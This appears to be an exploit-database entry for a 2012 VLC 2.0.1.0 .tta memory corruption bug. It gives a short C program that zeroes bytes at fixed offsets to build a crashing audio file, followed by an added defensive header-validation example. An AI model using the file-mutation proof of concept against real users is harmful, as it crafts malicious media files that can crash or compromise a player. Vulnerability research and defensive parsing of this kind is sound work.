VLC v. 2.0.1.0 .tta Memory Corruption



EKU-ID: 1701 CVE: OSVDB-ID:
Author: Dan Fosco Published: 2012-03-20 Verified: Verified


# Exploit Title: VLC v. 2.0.1.0 .tta Memory Corruption
# Date: 3/18/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 2.0.1.0
# Category: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

Tested on stable 2.0, 1.1.11, 2.0.1.0 (newest release as of 3/15/2012)

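#include <stdio.h>

int main(int argc, char *argv[])
{
    FILE *f;

    /* Expect exactly one argument: the .tta file to modify. */
    if (argc != 2) {
        fprintf(stderr, "usage: %s <file.tta>\n", argv[0]);
        return 1;
    }

    /* Open for in-place update; binary mode keeps offsets exact on Windows. */
    f = fopen(argv[1], "r+b");
    if (f == NULL) {
        perror("fopen");
        return 1;
    }

    /* Overwrite single bytes at fixed offsets with 0x00. */
    fseek(f, 10, SEEK_SET);
    fputc('\x00', f);

    fseek(f, 11, SEEK_SET);
    fputc('\x00', f);

    fseek(f, 26, SEEK_SET);
    fputc('\x00', f);

    fseek(f, 68, SEEK_SET);
    fputc('\x00', f);

    fseek(f, 59, SEEK_SET);
    fputc('\x00', f);

    fclose(f);
    return 0;
}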

// The code updates a .tta file in place; sample files can be found on the VideoLAN FTP server.
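
Added example (not part of the original advisory and not VLC code): a sanity check a parser can run on the fixed 22-byte TTA1 header before using any field for sizing or arithmetic. It assumes the public TTA1 layout (magic, format, channels, bits per sample, sample rate at offset 10, sample count at offset 14, CRC-32 of the first 18 bytes at offset 18), which the page does not describe; the function names and the 44100 Hz sample header are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TTA1_HDR_LEN 22 /* assumed fixed header size, see lead-in */
enum tta_status { TTA_OK, TTA_SHORT, TTA_BAD_MAGIC, TTA_BAD_FIELD, TTA_BAD_CRC };

static uint32_t rd_le(const uint8_t *p, int n) { /* n-byte little-endian read */
    uint32_t v = 0;
    while (n--) v = (v << 8) | p[n];
    return v;
}

static uint32_t crc32_ieee(const uint8_t *buf, size_t len) {
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        crc ^= buf[i];
        for (int b = 0; b < 8; b++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* Reject a header before any field is used for sizing or arithmetic. */
enum tta_status tta1_check_header(const uint8_t *buf, size_t len) {
    if (len < TTA1_HDR_LEN) return TTA_SHORT;
    if (memcmp(buf, "TTA1", 4) != 0) return TTA_BAD_MAGIC;
    if (rd_le(buf + 6, 2) == 0 || rd_le(buf + 8, 2) == 0 ||  /* channels, bits */
        rd_le(buf + 10, 4) == 0 || rd_le(buf + 14, 4) == 0)  /* rate, samples */
        return TTA_BAD_FIELD;
    if (crc32_ieee(buf, 18) != rd_le(buf + 18, 4)) return TTA_BAD_CRC;
    return TTA_OK;
}

/* Constructed sample: format 1, 2 channels, 16 bit, 44100 Hz, 441000 samples. */
void tta1_sample_header(uint8_t out[TTA1_HDR_LEN]) {
    static const uint8_t fields[18] = { 'T','T','A','1', 1,0, 2,0, 16,0,
        0x44,0xAC,0,0,  0xA8,0xBA,0x06,0 };
    memcpy(out, fields, sizeof fields);
    uint32_t crc = crc32_ieee(out, 18);
    for (int i = 0; i < 4; i++) out[18 + i] = (uint8_t)(crc >> (8 * i));
}

int main(void) {
    uint8_t h[TTA1_HDR_LEN];
    tta1_sample_header(h);
    printf("intact header: %d\n", tta1_check_header(h, sizeof h));
    h[10] = h[11] = 0;  /* the first two offsets the page's program clears */
    printf("offsets 10, 11 cleared: %d\n", tta1_check_header(h, sizeof h));
    return 0;
}
```

In the constructed header, clearing offsets 10 and 11 leaves a sample rate of 0, so the check returns TTA_BAD_FIELD; any other change to the first 18 bytes is caught by the CRC comparison.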